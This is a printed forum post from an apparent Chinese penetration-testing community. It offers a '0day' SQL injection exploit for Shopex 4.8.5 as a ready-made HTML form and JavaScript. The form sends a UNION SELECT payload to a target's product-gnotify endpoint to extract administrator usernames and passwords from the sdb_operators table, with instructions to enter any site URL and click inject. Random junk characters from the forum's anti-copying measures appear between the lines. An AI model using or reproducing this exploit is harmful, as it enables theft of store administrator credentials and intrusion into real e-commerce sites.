中国网络渗透测试联盟
标题:
Shopex 4.8.5 SQL Injection Exp 0day
[打印本页]
作者:
admin
时间:
2013-1-23 09:20
标题:
Shopex 4.8.5 SQL Injection Exp 0day
<center>
+ E2 R: ?) Q0 k) I2 }
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
8 V1 P) i r5 `: y! Y
<form action="" method="post" name="submit_url">
9 @+ t5 n; L6 M, z
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
# M/ U: o" @% Q: B5 m9 Q
<input type="hidden" name="goods[goods_id]" value="3">
6 l6 [# {' o# y2 k8 U$ c
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
, J/ P" l- A' N9 J- d/ }$ C& J& {
<input type="submit" value="给我注入" onclick=fsubmit()>
/ X5 G3 C6 x7 \5 S7 K
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
/ \+ g6 ?# x* \8 Q
P0 @1 H H, J/ @! D6 {
<script>
5 l; T, u3 h8 F) n, m8 @
function fsubmit(){
( m% _9 L( x8 o6 y$ L' a
form = document.forms[0];
$ d6 w. n7 @& P! R2 U3 }
form.action = form.url.value+'/?product-gnotify';
; e; c7 ]0 I. p
form.submit();
/ P$ l1 m/ ?% S5 C
}
- o: r; e2 | {0 d9 i
</script>
9 `2 a8 t. e4 A( D. _0 j! I
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2